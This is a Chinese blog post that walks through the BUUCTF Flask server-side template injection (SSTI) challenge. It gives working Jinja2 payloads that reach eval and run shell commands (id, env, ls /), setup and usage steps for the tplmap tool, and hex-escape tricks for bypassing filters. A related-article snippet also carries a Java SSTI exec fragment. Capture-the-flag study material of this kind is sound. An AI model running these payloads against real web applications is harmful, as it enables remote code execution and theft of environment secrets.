SSTI例题buu[Flask]SSTI

最新推荐文章于 2024-03-13 21:47:16 发布
最新推荐文章于 2024-03-13 21:47:16 发布
阅读量3.2k 收藏 5
点赞数
分类专栏: 笔记 文章标签: 网络安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cuddlylm/article/details/124053241
版权

方法一:手注
在这里插入图片描述

打开只有这个
访问http://your-ip/?name={{233233}},得到54289,说明它执行了我们的命令,SSTI漏洞存在。
这里的54289是233233的运算结果

获取eval函数并执行任意python代码的POC:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

打印环境变量poc

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("env").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

方法2:

用tplmap脚本
Tplmap是一个python工具,可以通过使用沙箱转义技术找到代码注入和服务器端模板注入(SSTI)漏洞。该工具能够在许多模板引擎中利用SSTI来访问目标文件或操作系统。一些受支持的模板引擎包括PHP(代码评估),Ruby(代码评估),JaveScript(代码评估),Python(代码评估),ERB,Jinja2和Tornado。该工具可以执行对这些模板引擎的盲注入,并具有执行远程命令的能力。
拓:
kali下安装tplmap(安装之前虚拟机要换源不然的话可能会报错,换源的教程我写在awd里)
kali2020版及以上, 输入python2命令会执行python2, python3也存在。
但pip默认是pip3, 而我们需要的是pip2, 所以我们需要先安装pip2

#进入家目录
cd

#建立目录ins-pip2
mkdir ins-pip2

#下载pip2安装脚本
wget  https://bootstrap.pypa.io/pip/2.6/get-pip.py

#python2执行 需要sudo权限
sudo python2 get-pip.py

#升级pip2
sudo pip2 install --upgrade pip

#安装pip2扩展工具,不然后面安装还是报错
sudo pip2 install --upgrade setuptools


tpl是用python2编写的,报错一般是使用py3

#使用git克隆tplmap
git clone https://github.com/epinna/tplmap   #这里如果报错的话把https换成git

cd tplmap

sudo pip2 install -r requirements.txt

tplmap使用模板

./tplmap.py -u <'目标网址'>

拓展:查看根目录(ctf简单的题目flag一般在根目录)

http://114.67.246.176:17130/?flag={{ config.__class__.__init__.__globals__['os'].popen('ls /').read() }}

关于绕过 _ ’ . 这三个被过滤了,但可以用十六进制绕过
注意:模板注入时可以使用,但正常的python语法是不支持的

_      \x5f     \x5F
.       \x2E
单引号'被过滤可以用双引号"代替

用"[] (类似数组下标)"的方式选定
也就是说下面的写法是等价的

{{"".__class__}}
{{""["\x5f\x5fclass\x5f\x5f"]}}
cyphersec
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Flask SSTI/沙箱逃逸的一些总结
01-20
0x00 SSTI原理 ​ 模板注入,与SQL注入、命令注入等原理相似,都是用户的输入数据没有被合理的处理控制时,就有可能数据插入了程序段中成为程序的一部分,从而改变了程序的执行逻辑。 0x01 沙箱逃逸原理 沙盒/沙箱 ...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
buuctf [Flask]SSTI
qq_1873822的博客
03-16 2530
漏洞简介 SSTI即服务端模版注入攻击。由于程序员代码编写不当,导致用户输入可以修改服务端模版的执行逻辑,从而造成XSS,任意文件读取,代码执行等一系列问题。 复现过程 访问http://node3.buuoj.cn:29153/?name={{2*2}} 说明SSTI漏洞存在。 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warni
Buuctf[Flask]SSTI 1
F1or_的博客
09-28 2608
最近CTF比赛里出了一道SSTI的题目,当时没有做出来,现在来学习下 SST是由于开发者的不恰当言语所造成 <html> <head> <title>SSTI_TEST</title> </head> <body> <h1>Hello, %s !</h1> </body> </html> 正确代码应是 <html> <head&g
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记
最新发布
qq_39947980的博客
03-13 1428
CTF题型 SSTI(1)基础必过 学会自己手动构造payload
buuctf-[Flask]SSTI
m0_62094846的博客
04-22 1075
页面上只有Hello guest,源代码上也是什么都没有,抓包添加XFF也没有改变。 是要GET一个参数name,这个不好想到 顺便确定有SSTI漏洞 <加字母就会被过滤 Smarty中的方法也不能用了 获取eval函数并执行任意python代码的POC {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__i...
[Flask]SSTI
1ance's blog
11-18 1438
文章目录环境解题思路参考 环境 BUUCTF上的在线环境,启动靶机,获取链接: http://node4.buuoj.cn:27904 解题思路 访问后显示页面。 根据题目提示是考SSTI,所以我们传个name参数看看。 http://node4.buuoj.cn:27904/?name=12,将我们的12显示在页面。 我们在构造{{2*3}}看看,是否存在SSTI。 成功执行了乘法,说明是存在SSTI的,接下来我们要做的是寻找可以执行命令的函数所在的类。 这里我在网上找的: {% for c in
BUUCTF-Real-[Flask]SSTI
分享
02-02 1147
服务端模板注入SSTI,可进行代码执行操作!
fenjing工具,ssti
12-17
fenjing一把梭哈ssti,简单绕过waf
SSTI
03-09
SSTI
flaskssti:测试SSTI
02-21
烧瓶
SSTI简单总结和例题
Aiwin的博客
07-21 2579
SSTI简单总结和例题CISCN 2019华东南]Double Secret和[护网杯 2018]easy_tornado
ssti详解与例题以及绕过payload大全
HoAd'blog
02-10 8916
ssti详解与例题以及绕过payload大全 [BJDCTF2020]Cookie is so stable user=1231{{2*4}} 判断是不是ssti user={{system('ls')}} 执行命令,但不能成功,,好像是空格不可以 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 这是最后的payload https://0day.work/jinja2
tplmap-模板注入工具
用博客做做记录的小白
12-14 391
kali下tplmap的安装与基础使用命令
Tplmap的安装与用法(内包含解决缺少库报错的处理教程)
EC_Carrot的博客
11-15 8860
Tplmap的安装步骤 在kali打开终端,输入 git clone https://github.com/epinna/tplmap 关于git,如没有该命令,则需要安装:(该命令需要在root权限下运行) apt-get install git 有了git,以后github上下载项目都可以用git clone url这种形式来获取了 目录内容如下图 关于缺少库报错的处理 关于缺少库,在Tplmap目录下有一个名为requirements.txt的文本文件,内容如下: PyYAML==5.1.2
Tplmap用法
热门推荐
stybill的博客
06-27 4万+
Tplmap下载:安装包可查看我的下载资源页面 Python环境:2.7 (这一点很重要很重要很重要) Python所需要的包: PyYAML5.1.2 certifi2018.10.15 chardet3.0.4 idna2.8 requests2.22.0 urllib31.24.1 wsgiref==0.1.2 (这些包只有在python2.X中才有安装) 进入到sqlmap.py目录下,运行命令行窗口: 命令:python tplmap.py -u “URL/?flag” -u指定URL的地址 ?
ctf线下AWD攻防赛学习笔记
普通Gopher
10-20 9977
ctf线下AWD攻防赛学习笔记 CTF线下攻防赛主要以攻防模式(Attack & Defense)来呈现。一般在这种模式下,一支参赛队伍有三名队员,所有的参赛队伍都会有同样的初始环境,包含若干台服务器。参赛队伍挖掘漏洞,通过攻击对手的服务器获取Flag来得分,以修补自身服务器的漏洞防止扣分。 在这种赛制中,不仅仅是比参赛队员的智力和技术,同时也比团队之间的分工配合与合作。 题目类型 语...
ctf show-web入门 SSTI篇部分题解
volcano的博客
02-04 3850
ctfshowSSTIweb361web362web363request.args传参绕过web364chr()绕过web365中括号绕过web366attr获取变量request.cookies传参web367web368 SSTI ssti模板注入基本原理推荐看这篇文章,这个师傅写的很详细,小白也很容易看懂。 web361 这个hackbar挺好用的,有现成模板,当前目录只有一个app.py,我们看一下上级目录 ?name={{ config.__class__.__init__.__globals_
flask ssti
09-26
Flask SSTI(Server-Side Template Injection)是指在Flask应用中,由于未正确处理用户输入,导致用户输入的模板言被当作代码执行的漏洞。攻击者可以通过向模板注入恶意代码来执行任意命令或获取敏感信息。要防止...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值